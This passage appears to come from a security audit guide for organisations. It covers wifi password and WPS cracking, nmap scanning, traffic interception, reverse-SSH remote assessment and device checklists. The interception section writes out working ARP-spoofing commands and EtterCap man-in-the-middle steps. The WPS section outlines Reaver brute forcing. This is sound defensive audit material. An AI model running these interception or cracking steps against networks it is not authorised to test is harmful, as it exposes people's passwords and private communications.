It is worth noting that an attacker with the resources and the expertise could increase this rate by a factor of a hundred. Using a computer with powerful graphical processing units (GPUs) or a cloud computing service like Amazon’s EC2, it is possible to test 250,000 or more keys per second. A setup like this would still take several lifetimes to guess a strong password, however.

Regardless, the success of this attack against a wireless network would allow an attacker to bypass all perimeter controls, including the network firewall. Without access to the office LAN, a non-ISP, non-government attacker would have to position themselves on the same network as an external staff member in order to exploit any flaws in the organization’s email or file-sharing services. With access to the local network, however, that attacker could begin carrying out local attacks quite quickly, and from a distance.

See the Wireless Range Mapping activity for guidance on mapping the reach of the wifi network.

References

• Tutorial: “How to Crack WPA/WPA2” (Aircrack-ng Wiki) “Aircrack-ng” (Aircrack-ng Wiki)
• Documentation: “Aireplay-ng” (Aircrack-ng Wiki)
• Documentation: “Airodump-ng” (Aircrack-ng Wiki)

WPS PIN Cracking

WPS was built as an addition to WPA to make it easier to add devices without typing in secure passwords, but this ease of use means that a malicious actor can pose as a device and effectively reduce the potentially very difficult passwords WPA allows down to a simple numeric-only 8 character PIN. Further, the WPS system allows an attacker to work on this PIN in two parallel chunks, further reducing its security. This, like WEP, is a "live" attack - you have to stay connected to the network - but also like WEP, it is a guaranteed attack; your brute forcing of the WPS system will eventually (2-10 hours) allow you network access.

Instructions

• Find the BSSID of the target routerr
• Use Wash to find WPS Routers
• Start Reaver : estimated time: Between 2 and 10 hours

References

• Guide: “Hacking my own router with Reaver, guide to brute forcing Wifi Protected Setup” (Nathan Heafner)
• Guide: “WPS – How to install and use Reaver to detect the WPS on your home router” (University of South Wales)
• Documentation: “Airodump-ng” (Aircrack-ng Wiki)
• Tutorial: “Resetting WPS Lockouts” (Kali Linux Forums)

Recommendation

Recommendations for non-WPA networks

Transitioning to WPA networks with strong passwords, even for guest networks, is recommended.

MAC filtering and WEP provide no effective protection for a wifi network. Most wifi routers offer WPA encryption as an option, and if this is available it should be immediately implemented. Some older routers (and wifi devices) do not support WPA. It is highly recommended to upgrade immediately to hardware that supports WPA and to eliminate all WEP network access. Very few devices still functional do not support WPA2. As WPA3 becomes an option, upgrade to that.

Recommendations for WPA networks

WPS Pin entry should be disabled on the wireless router, or only enabled temporarily to add new devices to the network.

Choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

The WPA password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains four or five—or more—relatively uncommon words.) The password should not contain common words, including number sequences, especially if they are related to the organization, its employees or its work.

A guest network, with no local network access and a distinct (possibly easier to communicate) password should be available if guests are ever given wifi access. Because passwords for guest networks inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the guest password should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

Network Scanning

Summary

Network scanning is a technique used to gather information about devices connected on a certain network. It involves enumerating open ports and services running to determine the type of device, the operating system it is running, the applications that is it running and a lot more. There are a lot of open source tools that you can used to perform this technique. Though it may look like simple and ordinary technique, it may be used for both good and bad intentions.

The goal for this exercise is to identify, enumerate and categorize all devices connected to the network. Any device that has an IP address is our target. This may include:

• Desktop computers
• Laptop computers
• Tablet devices
• Mobile phones
• Printers
• Wireless routers
• VoIP devices
• Smart TVs and appliances
• Servers and storage devices

Overview

• Confirm what devices and servers are in scope of the audit, and confirm that any service providers (website hosts, cloud hosts, etc.) are informed and OK with any scanning to be conducted.
• Enumerate and categorize all devices connected to the organization's network. Note that this could include IoT (Internet of Things) devices, such as IP cameras used for security, "Smart" devices, and personal devices such as mobile phones which may not be in scope. Discuss the scope of the audit as it applied to devices connected to the work network and ensure the staff understand what you are doing.
• In some cases, the audit scope may include external devices. The scanning in these cases will be very targeted. If your auditee agreed to have their public facing machines scanned, keep in mind that you need to consider asking your auditee for whitelisting options for shunning IDS/IPS, firewalls and other blocking mechanisms during your scan. Also make sure that you have verified the target in-scope. This is to avoid scanning out-of-scope targets that may lead you to other problems.
• Categorize and gather additional detail on the devices that you will discover
• Explore potential vulnerabilities, unexpected devices, and suspicious open ports

Materials Needed

• Laptop or appliance that can scan the network
• nmap/zenmap

Considerations

• In Scope Devices Just always remember that some may not want you to scan everything on their network. To avoid this, always ask your auditee if there are specific devices that needs exclusion. These machine can be critical to their operation or they just don't want to get scanned. If your auditee have exclusions, explain the consequences possible if a machine does not undergo vulnerability assessment. If scanning public servers, verify that the server host (web company, cloud provider, etc.) has approved of the scan, and than remote scanning is legal in the jurisdiction you are performing it from and in the location of the remote server.

Walkthrough

Local networks often have a variety of devices connected to them - servers, laptops, printers, and user devices such as cellphones and tablets. Scanning the connected devices can reveal potential areas for further research such as odd ports being open, out of date devices/services, forgotten servers/services etc. These information are then reviewed in vulnerability research exercise, and then (if required) validated in the penetration testing exercise.

Using a network scanning tool (nmap/zenmap work well), discover the devices connected to the organization's network, and explore further information such as services, service banners, and operating systems. More intense scans can be too time-consuming to run across the entire network, so target those to higher value systems. As always, be aware of the scans and additional scripts you choose, and focus your exploration (in nmap) on scripts categorized as "safe".

Overall Process

1. Using zenmap/nmap, identify all of the devices currently active on the network. It is worth repeating a quick scan at different times of the day and on different days to get a more complete view of the network.
   • Discover network-connected devices, including servers and workstations, but also smartphones, printers, security cameras, voip phones, and other devices.
   • Record the version and patch levels of software on the device. ⁴⁵
2. For the active, in-scope devices, the next step is to gather additional details including hostnames, mac addresses (useful for tracking devices over multiple days, as their IP address may change), operating system and versions, port numbers, and any running services such as shared drives, remote management services and old or legacy services. Doing host enumeration sometimes takes time, as not all devices may respond to your scans in the same way. To overcome this, there are variant tools with the steps on how to perform an efficient network scan.
   • Run OS detection options
   • Scan for open ports and service banners (not all ports correctly map to their "expected" services, also provides service version information)
   • select additional nmap scripts and more exhaustive port scanning as needed. Filter for safe scripts!

3. Categorize the devices that you will discover. This is to make it more efficient later when runing vulnerability scans, enabling you to target them effectively. For devices which are not easily categorized, see the IoT section below

4. Port/Service research, and How to decide if an open port is suspicious If a port is open in a personal computer or mobile device, this should be immediately considered suspicious and investigated.
   • Inspect all systems providing internal services to the host organization.
   • Identify weak ports or services available under the current device's firewall configuration. ⁴⁶
   • Identify and investigate any open ports that should not be open (e.g.: almost no ports should be open in personal computers, see below)
   • Identify all odd/obscure/one-off services. ⁴⁷

5. Using the list of software versions and patches identify attacks and, if possible, identified malware that devices in the office are vulnerable to.

Custom instructions per type of device

Servers

An open port in a server or IoT device should be investigated if it doesn't correspond to a known service. For example, if the open port is 80, 8080, or 443, it's supposed to be open for a web server, so you can try to browse it by pasting the IP address in your browser address bar.

If it's for SSH (port 22), try to log into it through SSH. If the service isn't supposed to be running in the identified device, you can run a scan of the open ports and request service banners, and/or try to telnet directly to the IP:port to identify what service they are connected to. To identify what a port might be used for, look at the complete list at IANA.org. Using nmap's banner scripts will also reveal what the service reports itself as (for example, you can run ssh, usually port 22, on port 443, usually https). Once you have identified what service that port might be used for, always check that that service is actually running in the machine and that the user or sysadmin is aware of it.

In general, these are ports that might be open in a server:

IoT Devices

IoT (Internet of Things) is getting popular in use because of it's ease of use and ability to address certain needs. (e.g. use of IP camera instead of CCTV). As classes of network appliances become common, additional exercises (such as the VOIP assessment) can be created. For others, it is still worth conducting a basic assessment to determine what security implications network-connected devices may have.

In the course of network scanning, watch for devices without clear operating system identification (from nmap/zenmap), and/or devices registering as Linux or unknown (particularly if there are not Linux users or servers), and use hostnames and MAC address lookups Wireshark, MACVendors for "hints".

Follow up on these devices with more intensive, specific scans to positively identify them, and/or follow up with staff to help physically locate the devices. Some devices, such as Smart TVs, may not even be normally thought of as devices worth considering, but if they are connected to the work network, they can add vulnerabilities.

Once any IoT devices have been identified, follow up with research as to their current and possible patch level/software update, what vulnerabilities they may have even if fully updated, and if there have been any known attacks against the platform. Check their configuration to see if they are accessible from the Internet (directly, via UPnP, or via an external service that the device connects out to). Check to see that default passwords have been updated, and any service-connected devices have strong, unique and not-previously-breached passwords.

If there are un-mitigateable vulnerabilities, consider suggesting removing the IoT device from the network or creating a separate network disconnected from organizational resources for non-work devices.

Windows / SMB Networks

• SNMP
• SMB
• NetBIOS
• Shared Folders
• RDP
• Telnet
• Password Sniffing

You can use smbtree to request a list of all smb network device names and nmblookup to connect them to their IP address.

Unsigned NTLM authentication messages vulnerable to Man-in-the-Middle attack on SMB file servers. It also allow an attacker on the LAN to add, remove or copy files to and from the organization’s file servers (and workstations with filesharing enabled).

• On Windows, use netstat from the command prompt as an administrator: the command would be netstat -ab - this will show you the name of the process running on the open port.
• To identify the process on the open port more in-depth, run the official Microsoft Process Explorer (right-click a process to see the Properties - the port will be visible in the TCP/IP tab and you will find more information on the path of the process in the "Image" tab).
• You can investigate the process on Virustotal directly from Process Explorer, by right-clicking on the process and then clicking "Check VirusTotal".

MacOS

• On Mac, launch netstat lsof - this will show you the path of the process running on the open port.

GNULinux

• On Linux, follow these instructions.

External Network Scanning

Selected scanning of external network devices (websites, webmail, extranet services) may also reveal vulnerabilities or other areas of concern. However, it is important that you seek approval or any written document that proves you have the authority to scan your target organization along with its web resources and services.

External network scans are different for local network scans. This is because you are scanning devices that are publicly available, and can be done remotely outside the organization's premise. If your auditee agreed to have their public facing machines scanned, keep in mind that you need to consider asking your auditee for whitelisting options for shunning IDS/IPS, firewalls and other blocking mechanisms during your scan. Also make sure that you have verified the target in-scope. This is to avoid scanning out-of-scope targets that may lead you to other problems.

Most of the machines you'll encounter over external network scans were:

• Web servers
• DNS servers
• Mail servers
• Gateway devices
• FTP Servers
• Cloud servers

Using nmap/zenmap

Using a network scanning tool (nmap/zenmap work well), discover the devices connected to the organization's network, and explore further information such as services, service banners, and operating systems. More intense scans can be too time-consuming to run across the entire network, so target those to higher value systems. As always, be aware of the scans and additional scripts you choose, and focus your exploration (in nmap) on scripts categorized as safe or "non-disruptive".

• Discover network-connected devices, including servers and workstations, but also smartphones, voip phones, and other devices.
• Open ports
• OS detection
• Capture banners (not all ports correctly map to their "expected" services, also provides service version information)
• additional Scripts and more exhaustive port scanning as needed (See different variants)

According to it's nmap's website:

"Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts". It's considered as the most popular network mapping tool available.

Below are commands to perform network scanning using Nmap.

• Basic Nmap Commands

• Advance Nmap Host Discovery and Port Scanning

• Nmap Version Detection and Service enumeration

• Nmap Version Detection and Service enumeration

• Scanning using Nmap Scripting Engine

• Scanning using Nmap Firewall/IDS Evasion & Spoofing Options

• Nmap Scan Output Results

Working with GUI using Zenmap

While Nmap may seem to be intimidating to some specially with all those commands and options, you can use a GUI-based Nmap called Zenmap. You can download Zenmap from this link

Zenmap has different features that helps you manage scans to importing and exporting of results.

It comes with a pre-set scan settings that you can choose. Depending on your target environment and your agreement with the client, you can select from:

Recommendation

While office networks are often treated as "trusted" spaces, measures should be in place to reduce the potential harm of an attacker who gains access. In addition, devices that "travel" -- such as laptops and mobile phones -- should have adequate security settings (generally, firewalls) to protect them on other networks.

A policy should be in place for connecting personal devices to work networks, as well as work devices to non-work networks.

Network Traffic Analysis

Summary

Any content that is sent out over the network without encryption is easy to intercept; this includes email, web passwords, and chat messages.

This attacker could be someone, such as a patron of the Internet cafe where a staff member is working, who just happens to be using the same local network to connect to the Internet. Or, she could work for an organization with privileged access to the relevant network, such as the Internet Service Provider (ISP) of either the sender or receiver and other network-backbone connections made along the way.

Overview

• Intercept network traffic
• Review it for security concerns
• Watch for unencrypted email (POP/SMTP/IMAP) connections, unencrypted website logins (for blogs, websites, and webmail in particular)

Materials Needed

• Wifi device and drivers supporting "promiscuous mode" (see http://www.aircrack-ng.org/doku.php?id=compatible_cards&DokuWiki=a36042531edb54f9b95a76ff61d77d14)

Considerations

• Treat captured network traffic with the utmost security and empathetic responsibility. They may contain very personal data, passwords, and more. These should not be shared except in specific, intentional samples with anyone, including the organization itself.

Walkthrough

Network Traffic Interception

Step 1: The attacker tricks the victim into routing all of their traffic through the attacker’s machine. This involves making a simple request to the victim’s IP address, which is not difficult to do. Computers are rarely configured to ignore such requests.

$ sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

$ sudo arpspoof -i wlan0 -t 192.168.1.99 192.168.1.1

Sample Output:

00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
...
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55

In the example above, only a single victim (192.168.1.99) is being targeted, but the attack works fine against multiple victims, or even against the entire network. In other words, the attacker does not need to know which IP address (on the office or Internet cafe LAN, for example) belongs to the target. Furthermore, the victim is extremely unlikely to notice any sign that this phase of the attack is taking place.

EtterCap provides a powerful frontend to managing this process with multiple potential targets. In EtterCap:

• Under the "Sniff" menu, select "Unified sniffing" (for most cases where you are using one interface to both intercept and forward traffic), and select the relevant interface (wlan0)
• Under the Hosts menu, select the systems on the network you will target, or leave blank to target all systems
• Under Mitm, select "arp spoofing" for this example
• Select "Start" under the Sniffing menu

Step 2: At this point, if the attacker is looking for unencrypted traffic, all the attacker needs to do is launch a packet-sniffer, such as Wireshark, and scan through the intercepted traffic for specific vulnerable information, such as email or website logins, as well as traffic revealing shadow infrastructure usage, such as Dropbox.

Wireshark can also be used to identify malicious traffic.

If you rarely use Wireshark, the output you will see will be a long list of packets, protocols and connections that might be hard to classify. To look into suspicious processes in a clearer way, you can use the "Protocol Hierarchy" option in the Statistics menu A good video to learn how to use this option for this purpose can be found here.

• If you want to practice with captures of malicious traffic, you can find them in the Wireshark wiki.

Recommendation

Only use services with "SSL" encryption ("HTTPS"), and consider adding HTTPS Everywhere to browsers. This does not itself guarantee protection from all attacks, but it is a good first-step in protecting information (such as passwords or email) in transit from your computer to the service provider.

Remote Network and User Device Assessment

Summary

This component allows the auditor to work remotely to identify the devices on a host's network, the services that are being used by those devices, and any protections in place, as well as to assess the security of the individual devices on the network.

Overview

There can be several approaches for this exercise, depending on the scenario.

Scenario 0

The organization has contacted the auditor through an intermediary who is familiar with tech and can follow SAFETAG instructions, or the organization has a tech person among their employees.

This scenario is comparable to a situation where the auditor is on site. In this case, the auditor will instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

The organization has someone among their employees who is ready to follow simple instructions, including opening a terminal and pasting commands we will provide them.

In this scenario, the auditor will send simple instructions to the auditee, so as to be able to access the organization's network through a reverse SSH tunnel and assess the LAN and single devices from there. To run the computer used within the organization's network to establish the tunnel, a UNIX system is needed. This will be a Linux live distribution or a Mac computer.

Scenario 2

In this scenario, no one at the organization is ready to apply complex instructions. Instead of relying on an individual, the auditor will rely on tunneling into a device located in the physical space of the auditee. This can be done in two ways:

1. Remote Desktop or remote VPN into targeted Network. Remote Desktop is tunneling into a targeted machine that lives on the same targeted LAN network where you wish to scan the network and do the device assessment; the auditor controls the machine remotely and uses it as the auditor machine.
2. VPN to a trusted VPN server. In this case, the auditee will connect one of their machines to a trusted VPN server, and the auditor will connect to the same VPN server, allowing both LANs at the auditee's and auditor's ends to connect.

Materials Needed

Scenario 1

• A machine accessible globally via ssh. It could be a machine or a virtual server
• A GNULinux machine on the auditor's side
• A machine running Linux or Mac with ssh on the auditee's end. If the audited organization only has Windows computers, they can use a live distribution, for example Ubuntu Live.
  • If you're using a live Linux distribution, you will probably need to guide the auditee into changing the BIOS settings for enabling the computer to boot from a USB stick.
• If we use sshuttle, net-tools needs to be installed on the auditee's side. This package is installed by default in Ubuntu.

Scenario 2

In the case of remote desktop:

• Clean PC connected to the local auditee LAN network
• Stable and fast Internet connection at both ends
• TeamViewer client installed on the local clean machine. (Windows remote desktop can also be used.)
• TeamViewer installed on the auditor's machine

In the case of using an in-the-middle trusted VPN server:

• A PC connected to the local auditee's LAN network
• Stable and fast Internet connection at both ends
• OpenVPN client installed on the local clean machine
• OpenVPN client installed on the auditor's machine
• A trusted OpenVPN Server

Applications to use: TightVNC TeamViewer Windows remote desktop

Considerations

Scenario 1

• Make sure that the auditee downloads the Linux image over TLS and guide them through the verification process (instructions for Ubuntu can be found here).
• When starting a live Linux distribution, make sure the auditee has a secure communication channel with you on a different device than the one that will be rebooted - for example through Signal on an Android phone, or on a different computer.
• Warn the auditee that they should not press "install" when the live Linux distribution has started, else their hard disk will be formatted and they will lose their data.
• Make sure that a secure communication channel is in place for sending the ssh commands to the auditee.
• The server used for the middle connection should be updated and secured, or updated and ephemeral.
• Make sure to remove/clean any persistent connections once you are done with auditing.

Walkthrough

Scenario 0

Instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

Legend

• S: Server - a machine accessible globally via ssh. It could be a machine or a virtual server
• A: Auditor's GNULinux machine
• C: A machine running GNULinux or Mac with ssh on the auditee's end

Instruct the auditee to initiate a connection to the server (S) and set up a reverse ssh server:

Let's assume we have a server named safetag-audit.org (S), and usernames for each auditee called auditee1, auditee2, etc.

• on the auditee's machine (C); the auditee will need to be instructed to run the following commands:

  service sshd start
  ssh -R 2200:localhost:22 [email protected]

  (the auditor has to provide the auditee with a password for the password prompt that will appear when this command is entered.)

  this will allow any connection to port 2200 on safetag-audit.org (S) to be sent to port 22 on the auditee's machine (C). The remote port is an arbitrary high number port (> 1023); a practice can be established to assign a number to each location and machine.

  example:

  the auditee on machine on site 0 could be instructed to run:

  ssh -R 2200:localhost:22 [email protected]

  this will allow the auditee to connect to port 2200 from within safetag-audit.org (S) and have traffic forwarded to port 22 on the auditee's machine (C).

  the auditee on machine on site 1 will run:

  ssh -R 2210:localhost:22 [email protected]

Important: make sure that the ports you use don't conflict with ports by other services or auditees, i.e. don't use a port number twice.

Once this session is open, the auditor can access the auditee's machine (C). At this point there are a few powerful options:

• simply ssh from S to C via the tunnel (port defined in the reverse tunnel on the server localhost interface);

example:

to connect to site 0:

    ssh [email protected] -p 2200

with site 1 in the previous example, the port would be 2210 (or whatever the auditee used in her command).

• Create a VPN-like connection to site:

  • create a forward tunnel from A to S that is "piped" into the reverse tunnel:

    ssh -L 2200:localhost:2200 [email protected]

  now you have a tunnel from your localhost:2200 to safetag-audit.org:2200, which in turn has a tunnel from safetag-audit.org:2200 to the client machine on port 22.

  • once you have that, you can use sshuttle (needs to be installed, it's in most Linux standard repositories) on the auditor's machine (A) to access additional resources in the auditee's network (as long as they are non-ICMP) directly from the Auditor's machine (A). Such resources might include web-based resources (router web interface for example) or remote desktop (to assess windows or mac clients) or accessing file shares on the auditee's network, etc...

  to do this, you would need to use client credentials through the tunnel you just created, and provide the client subnet to route traffic correctly through that "VPN":

      sshuttle -r [email protected]:2200 192.168.1.0/24

  once this tunnel is created, you should be able to access any resource on the remote network by its IP and port (for example, through the browser for http(s))

An additional thing that one might want to do is making the connection from C to S passwordless and automatic (this can be accomplished with tools or scripts readily available on the internet).

WARNING: Make sure to remove/clean any persistent connections once you are done with auditing.

There should be no need for multiple reverse tunnels, as multiple forward tunnels can be set up from S to C if needed (eg. VNC or RDP); this requires multiple forward tunnels from A to S though.

Scenario 2

Legend:

• A: Auditee's local machine; a clean machine, connected to the Internet through the auditee's LAN network
• B: Auditor machine

Someone at the auditee's side will prepare machine A in coordination with the auditor, then install TeamViewer.

After that, and using a trusted communication method, TeamViewer ID and passcode will be sent to the Auditor.

The auditor will use the ID and passcode to connect to the machine and start using machine A as the auditing machine.

There are pros and cons for this:

Cons:

1. Internet speed: You will need a high speed Internet connection to achieve such task, as the remote access will be transferring the desktop of the targeted machine to you in order to do the tasks.
2. Connection interruption: While you are working remotely, you might face some connection interruptions during your session, and restarting the remote access will be a challenge because in most of the cases you will need someone at the other end to authorize you to tunnel into the machine.
3. Physical limitations: You are still physically far from the machine, which means you cannot connect a USB drive to boot from it or do any other tasks that require you to be near the device.
4. Installing Kali Linux might be hard: It might be hard for a non-technical person to prepare a Kali Linux machine

Pros:

1. Usability: TeamViewer is easy to install and use. Anyone with basic knowledge on how to install software can assist you with preparing the auditing machine.
2. Network speed: Technically, your auditing machine is the machine you are connected to, which is physically located in the targeted office and connected to the LAN network. This means that you will have full speed running your audit tasks.

Note: Some remote assistant software provides VPN solutions that turn Machine A into a VPN Server and allow Machine B to VPN into it. Tunneling into that VPN server will allow you to connect to the local LAN network, which will allow you to use Machine B to run the audit.

Using an in-the-middle trusted VPN server

Legend:

• A : Auditee's local machine; a clean machine, connected to the Internet through the auditee's LAN network
• B: Auditor's machine
• C: OpenVPN Server

Auditee's Network --------- (A) ---------- C ---------- (B) ---------- Auditor's Network

The auditor will put efforts preparing an OpenVPN server (C) and create 2 profiles (Keys and configurations) to allow machines A and B to connect to C.

Get a VPS from your favorite and trusted VPS provider and keep in mind the physical location of the server, then install OpenVPN Server by following the instructions contained in this guide on Ubuntu Server.

The default configuration of OpenVPN will not allow the clients (A-B) to see each other on the network. To allow that, you have to enable client-to-client directive and enable your both subnets (Auditee and Auditor) to see each others networks. To do so, follow these instruction.

After finishing the installation and testing it, the auditor will pass the .ovpn file to the person at the auditee's site through a trusted way, and provide instructions on how to install and connect to the server. After connecting A and B to C, the auditor will be able to start the network and device assessment at the other end.

Note: In case the VPN is censored in A or B's countries, or in both, you can follow these instructions on how to bypass the censorship by using pluggable transports.

Recommendation

Router Assessment

Covered in full in Vulnerability Scanning and Analysis

• Find the router(s) (route works well for this)
• Test using default passwords
• Check for upgrades / un-patched vulnerabilities and backdoors
• Investigate potentially valuable data (logs, connected users)

Device and Behaviour Assessment

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software running on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview

• Identify what privilege level services are running under -- Are users using accounts with admin privileges, or are they using another user and have to type in a password to get admin rights? ⁵⁰
• Check for existence and status of anti-virus (and anti-malware tools) on the device. ⁵¹
• Record the version and patch levels of software on the device. ⁵²
• Identify what level of encryption is being used and is available for data storage on the device. ⁵³
• Using the list of software versions and patches identify attacks and, if possible, identified malware that devices in the office are vulnerable to.

Materials Needed

• A notepad may be useful

Considerations

• Communicate with the staff members the level of confidentiality you are treating discussions around their device and technology usage with - i.e. explain what incident response triggers you have agreed upon with the organization, and that anything not triggering that is to be only reported in aggregate.

Walkthrough

The auditor inspects a subset of key and/or representative user devices (work & personal). The auditor should focus on the work devices to limit scope creep, but if the office has many personal devices accessing organizational accounts/data, the auditor should share what "red flags" they are looking for and work in tandem with device owners and/or IT staff. For a small office, it may be possible to check every machine. For larger offices, the auditor should use a subset to get a feel for the overall security stance of user devices.

As you work with staff members, also interview them about the other devices they use such as phones and tablets, and how they connect to work services - email/webmail, chat Apps, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

Below is a checklist to assist in checking across different platforms/versions for common security needs.

OSX

• OS Security Updates

• Firewall
  • See http://support.apple.com/en-us/HT1810 for cross-version guidance
  • (GUI) Choose System Preferences from the Apple menu, Security (10.5 and before) or Security & Privacy (10.6 and later), then the Firewall tab.
• Anti-Virus Version
• User privilege
• Drive Encryption
• 151. sudo fdesetup status
• (GUI) Choose System Preferences from the Apple menu, Security (10.5 and before) or Security & Privacy (10.6 and later), then the FileVault tab.
• (VeraCrypt)
• Services Running
• (Command line) sudo launchctl list
• (Command line) ps -ef

• (GUI) The "Activity Monitor" application is located in /Applications/Utilities provides a similar interface to "top"

Windows

If Windows is not your primary OS, you can download sample Virtual Machines (with time limitations) from Microsoft through their project to improve IE support via https://www.modern.ie/en-us/virtualization-tools#downloads (see also http://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/ and https://modernievirt.blob.core.windows.net/vhd/virtualmachine_instructions_2014-01-21.pdf)

Windows 10

• OS Security Updates
• Start --Settings --Update & Security --Windows Update
• Firewall
• Start, type Firewall (select Windows Firewall)
• Privacy
• Start --Settings -- Privacy
• Anti-Virus Version
• Privacy
• (GUI) Start --Settings -- Privacy
• User privilege
• Start, type 'User Account', select "Change User Account Control settings"
• Drive Encryption
• (Bitlocker), https://docs.microsoft.com/en-us/windows/device-security/bitlocker/bitlocker-device-encryption-overview-windows-10
• Services Running
• Start, type "Task Manager"

Windows 8

• OS Security Updates
• Firewall
• (GUI) Start (or Down Arrow Icon, PC Settings) -- Control Panel -- Windows Firewall
• 151. Netsh Advfirewall show allprofiles
• (more detail: http://windows.microsoft.com/en-us/windows-8/windows-firewall-from-start-to-finish)
• Anti-Virus Version
• User privilege
• Drive Encryption
• https://diskcryptor.net/wiki/Main_Page
• Services Running
• Right-Click on bottom taskbar, select "Task Manager"

Installed updates

Control Panel Programs and features installed updates CLI: http://www.techsupportalert.com/en/quick-and-easy-way-list-all-windows-updates-installed-your-system.htm

Windows 7

In Windows 7, (GUI) Control Panel -- All Control Panel Items -- Action Center (Security tab) provides a quick run-down of most security features installed and their update status. It does not show drive encryption or specific versions.

• OS Security Updates
• Firewall
• (GUI) Control Panel -- All Control Panel Items -- Windows Firewall
• 151. Netsh Advfirewall show allprofiles
• Anti-Virus Version
• User privilege
• (GUI) Control Panel -- All Control Panel Items -- User Accounts and checking also the User Account Control settings.
• Drive Encryption
• (GUI) Control Panel -- All Control Panel Items -- BitLocker Drive Encryption
• (VeraCrypt) , https://diskcryptor.net/wiki/Main_Page
• Services Running
• 151. tasklist
• (GUI) Right-click on task bar, select "Start Task Manager"
• (Advanced) Use TechNet/SysInternal's Process Explorer: http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

Windows XP

If user is still operating on windows XP, recommendation is to upgrade to later windows. Windows XP is no longer supported and is not receiving security updates: https://www.microsoft.com/windows/en-us/xp/end-of-xp-support.aspx

If there is an organizationally critical system relying on Windows XP, removing it from the network and carefully managing data exchange with it may provide a bridge solution until a replacement process can be funded and rolled out.

Linux

• Firewall
• 151. sudo iptables -L -n
• 151. (Ubuntu, and only if installed) sudo ufw status
• (GUI) (Ubuntu, and only if installed) gufw
• Anti-Virus Version
• 151. deb: dpkg-query -l | grep virus rpm: yum list installed | grep virus
• See also: https://en.wikipedia.org/wiki/Linux_malware#Anti-virus_applications
• User privilege
• 151. groups
• Drive Encryption
• (VeraCrypt)
• Services Running
• 151. ps -ef
• 151. top

Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Outdated - Update Operating Systems and Other Software

Operating Systems and Softwares of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If there are not needed for work by the users, uninstall them

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Maware Scanner

An Anti-virus and Anti-malware offer some minimal protection to the system and therefore is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless. Therefore ensure that continuous udpdating of AV is done.

If Unencrypted Drive - Encrypt Hard Drives

When possible, build-in drive encryption (Filevault on OSX, BitLockeron Windows, and LUKS on Linux) tend to offer the most seamless, user-friendly experiences. VeraCrypt offers free cross-platform drive encryption and cna also create encrypted drives which can be shared across platforms.

If Inactive firewall - Activate both personal and server firewall (If present)

Again, where present, use built-in firewalls and configure them for both office and public network options. Testing to ensure systems can still perform expected office natworking (file sharing, printing, etc.) is essential unless alternatives are created.

Password Security Survey

Summary

Weak and "shared" passwords are prevalent - even after hundreds of well-publicized global password breaches, "password" and "12345" remain the most popular passwords, and password re-use is common. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.

Overview

• Using the password survey, determine the organization's baseline for password security

Materials Needed

• A prepared Password Survey (given sensitivity and need for anonymity, consider printing and then shredding/burning).
• The Level Up Activity, Password Reverse Race provides a staff activity.

Considerations

Walkthrough

Adapt this survey to get a sense of how passwords are used in the organization. Anonymous paper surveys, later destroyed, are a good way to gather this information. The earlier questions are more important in terms of getting a sense of password practices, so consider adapting or shortening the survey based on staff/leadership buy-in and risk considerations.

